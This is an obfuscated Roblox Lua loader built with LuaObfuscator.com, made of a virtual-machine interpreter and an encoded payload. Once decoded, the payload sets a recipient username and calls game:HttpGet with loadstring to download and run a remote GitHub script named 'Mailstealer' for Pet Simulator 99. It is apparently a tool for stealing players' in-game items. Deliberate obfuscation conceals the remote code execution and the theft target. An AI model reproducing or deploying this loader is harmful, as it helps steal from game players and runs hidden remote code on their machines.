--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v100=v5(v83,v19);v19=nil;return v100;else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + (941 -(282 + 595))))) -(v32-(932 -(857 + 74)))) + (569 -(367 + (1838 -(1523 + 114)))))) ;return v85-(v85%1) ;end end else local v86=(929 -(214 + 713))^(v32-1) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=0;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=(5534 -4263) -((343 -(32 + 85)) + 1044) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v37 * (1213 -(892 + 65))) + v36 ;end local function v23()local v38=(0 -0) -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(0 -(997 -(915 + 82)))) then v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + 4 ;v38=1 -0 ;end if (v38==((205 + 146) -(87 + 263))) then return (v42 * (16777396 -(67 + 113))) + (v41 * (118879 -53343)) + (v40 * (187 + 69)) + v39 ;end end end local function v24()local v43=v23();local v44=v23();local v45=1 -(0 + 0) ;local v46=(v20(v44,1188 -(1069 + 118) ,45 -25 ) * ((3 -1)^(6 + 26))) + v43 ;local v47=v20(v44,37 -16 ,31 + 0 );local v48=((v20(v44,32)==(792 -(368 + 423))) and  -((775 -(201 + 571)) -2)) or (19 -(10 + 8)) ;if (v47==(0 -0)) then if (v46==0) then return v48 * (442 -(416 + 26)) ;else v47=3 -2 ;v45=0 + 0 ;end elseif (v47==(3621 -1574)) then return ((v46==(438 -(145 + 293))) and (v48 * ((431 -(44 + 386))/(1486 -((2136 -(116 + 1022)) + 488))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/(((4 -3) + 1)^52))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v65=1, #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v52==(1 + 1)) then local v90=1636 -(1373 + 263) ;local v91;while true do if (v90==0) then v91=1000 -(451 + 549) ;while true do local v101=0;while true do if (v101==(0 + 0)) then if ((1 -0)==v91) then return v56;end if (v91~=(0 -0)) then else local v120=1384 -(746 + 638) ;while true do if (v120==1) then v91=1;break;end if (v120==0) then for v163=1 + 0 ,v23() do local v164=0;local v165;local v166;local v167;local v168;while true do if (2==v164) then while true do if (v165==1) then v168=nil;while true do if (v166~=(0 -0)) then else local v173=341 -(218 + 123) ;local v174;while true do if (v173==(1581 -(1535 + 46))) then v174=0 + 0 ;while true do if (v174==0) then local v181=0 + 0 ;while true do if (v181~=(561 -(306 + 254))) then else v174=1 + 0 ;break;end if (v181==0) then v167=0 -0 ;v168=nil;v181=1468 -(899 + 568) ;end end end if (v174~=1) then else v166=1;break;end end break;end end end if (v166==1) then while true do if (v167==(0 + 0)) then v168=v21();if (v20(v168,2 -1 ,604 -(268 + 335) )==(290 -(60 + 230))) then local v175=572 -(426 + 146) ;local v176;local v177;local v178;local v179;local v180;while true do if (v175~=1) then else v178=nil;v179=nil;v175=1 + 1 ;end if (v175~=(1458 -(282 + 1174))) then else v180=nil;while true do if (v176~=(811 -(569 + 242))) then else v177=0;v178=nil;v176=1;end if (v176==1) then local v182=0 -0 ;while true do if (v182~=(0 + 0)) then else v179=nil;v180=nil;v182=1;end if ((1025 -(706 + 318))~=v182) then else v176=2;break;end end end if ((1253 -(721 + 530))==v176) then while true do if (v177~=(1272 -(945 + 326))) then else local v183=0 -0 ;local v184;while true do if (v183==0) then v184=0;while true do if (v184==(1 + 0)) then v177=2;break;end if (v184~=(700 -(271 + 429))) then else local v192=0 + 0 ;while true do if (v192~=0) then else v180={v22(),v22(),nil,nil};if (v178==(0 + 0)) then local v198=0;local v199;local v200;while true do if (v198==1) then while true do if (v199~=(1171 -(418 + 753))) then else v200=0 + 0 ;while true do if (v200==(0 + 0)) then v180[3]=v22();v180[2 + 2 ]=v22();break;end end break;end end break;end if (v198==(0 + 0)) then v199=0;v200=nil;v198=530 -(406 + 123) ;end end elseif (v178==1) then v180[1772 -(1749 + 20) ]=v23();elseif (v178==(1 + 1)) then v180[3]=v23() -((1324 -(1249 + 73))^16) ;elseif (v178==(2 + 1)) then local v203=0;while true do if (v203~=(1145 -(466 + 679))) then else v180[6 -3 ]=v23() -((5 -3)^(1916 -(106 + 1794))) ;v180[4]=v22();break;end end end v192=1 + 0 ;end if ((1 + 0)~=v192) then else v184=1;break;end end end end break;end end end if (v177~=3) then else if (v20(v179,3,8 -5 )==1) then v180[4]=v58[v180[10 -6 ]];end v53[v163]=v180;break;end if (v177==2) then local v186=0;local v187;while true do if (v186~=0) then else v187=0;while true do if (v187~=0) then else if (v20(v179,1,1)~=1) then else v180[2]=v58[v180[116 -(4 + 110) ]];end if (v20(v179,586 -(57 + 527) ,1429 -(41 + 1386) )==(104 -(17 + 86))) then v180[3]=v58[v180[3]];end v187=1 + 0 ;end if (v187==(1 -0)) then v177=3;break;end end break;end end end if (v177==(0 -0)) then local v188=166 -(122 + 44) ;local v189;while true do if (v188==0) then v189=0;while true do if (v189==(1 -0)) then v177=3 -2 ;break;end if (v189==(0 + 0)) then local v193=0 + 0 ;while true do if ((0 -0)==v193) then v178=v20(v168,67 -(30 + 35) ,3 + 0 );v179=v20(v168,1261 -(1043 + 214) ,22 -16 );v193=1213 -(323 + 889) ;end if (1==v193) then v189=1;break;end end end end break;end end end end break;end end break;end if (v175~=0) then else v176=0 -0 ;v177=nil;v175=1;end end end break;end end break;end end break;end if (v165==(580 -(361 + 219))) then v166=0;v167=nil;v165=321 -(53 + 267) ;end end break;end if (v164~=0) then else v165=0;v166=nil;v164=1;end if (1==v164) then v167=nil;v168=nil;v164=1 + 1 ;end end end for v169=1,v23() do v54[v169-1 ]=v28();end v120=414 -(15 + 398) ;end end end break;end end end break;end end end if (v52==1) then local v92=0;local v93;while true do if (v92~=(982 -(18 + 964))) then else v93=0;while true do if (v93~=0) then else local v102=0 -0 ;while true do if (v102~=0) then else v57=v23();v58={};v102=1;end if (v102==(1 + 0)) then v93=1 + 0 ;break;end end end if (v93==2) then v52=2;break;end if (1~=v93) then else local v103=0;while true do if (0==v103) then for v148=851 -(20 + 830) ,v57 do local v149=0;local v150;local v151;local v152;while true do if (v149==(0 + 0)) then local v171=126 -(116 + 10) ;while true do if (v171~=0) then else v150=0 + 0 ;v151=nil;v171=739 -(542 + 196) ;end if ((1 -0)==v171) then v149=1 + 0 ;break;end end end if (v149==(1 + 0)) then v152=nil;while true do if (v150~=1) then else if (v151==1) then v152=v21()~=0 ;elseif (v151==(1 + 1)) then v152=v24();elseif (v151==(7 -4)) then v152=v25();end v58[v148]=v152;break;end if (v150~=(0 -0)) then else v151=v21();v152=nil;v150=1552 -(1126 + 425) ;end end break;end end end v56[3]=v21();v103=406 -(118 + 287) ;end if (v103==1) then v93=2;break;end end end end break;end end end if ((0 -0)==v52) then local v94=0;local v95;while true do if (v94~=0) then else v95=0;while true do if (v95==0) then v53={};v54={};v95=1;end if ((1123 -(118 + 1003))==v95) then v52=1;break;end if (v95==(2 -1)) then local v104=0;while true do if (0==v104) then v55={};v56={v53,v54,nil,v55};v104=978 -(553 + 424) ;end if (v104==1) then v95=2;break;end end end end break;end end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80==0) then if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end else local v105=v79[2];local v106,v107=v70(v77[v105](v13(v77,v105 + 1 ,v79[3])));v72=(v107 + v105) -1 ;local v108=0;for v118=v105,v72 do local v119=0;while true do if (v119==0) then v108=v108 + 1 ;v77[v118]=v106[v108];break;end end end end elseif (v80<=2) then local v109=v79[2];v77[v109]=v77[v109](v13(v77,v109 + 1 ,v72));elseif (v80==3) then local v125=v79[2];local v126=v77[v79[3]];v77[v125 + 1 ]=v126;v77[v125]=v126[v79[4]];else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=7) then if (v80<=5) then v61[v79[3]]=v77[v79[2]];elseif (v80==6) then if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end else local v131=v79[2];local v132=v77[v79[3]];v77[v131 + 1 ]=v132;v77[v131]=v132[v79[4]];end elseif (v80<=8) then v71=v79[3];elseif (v80>9) then v77[v79[2]]=v79[3];else v77[v79[2]]();end elseif (v80<=15) then if (v80<=12) then if (v80>11) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=13) then v77[v79[2]]=v79[3];elseif (v80==14) then local v140=v79[2];local v141,v142=v70(v77[v140](v13(v77,v140 + 1 ,v79[3])));v72=(v142 + v140) -1 ;local v143=0;for v153=v140,v72 do v143=v143 + 1 ;v77[v153]=v141[v143];end else v77[v79[2]]();end elseif (v80<=18) then if (v80<=16) then do return;end elseif (v80==17) then v71=v79[3];else do return;end end elseif (v80<=19) then local v116=0;local v117;while true do if (v116==0) then v117=v79[2];v77[v117]=v77[v117](v13(v77,v117 + 1 ,v72));break;end end elseif (v80==20) then v61[v79[3]]=v77[v79[2]];else v77[v79[2]]=v79[3]~=0 ;end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F50657453696D756C61746F722O392F6D61696E2F4D61696C737465616C657203083O00557365726E616D6503073O0059726F746E6D65030A3O004C6F61645363722O656E00143O00120D3O00013O00260B3O000B000100020004083O000B000100122O000100033O00122O000200043O00200700020002000500120D000400064O0001000200044O001300013O00022O000F0001000100010004083O0013000100260B3O0001000100010004083O0001000100120D000100083O001214000100074O0004000100013O001214000100093O00120D3O00023O0004083O000100012O00123O00017O00",v9(),...);
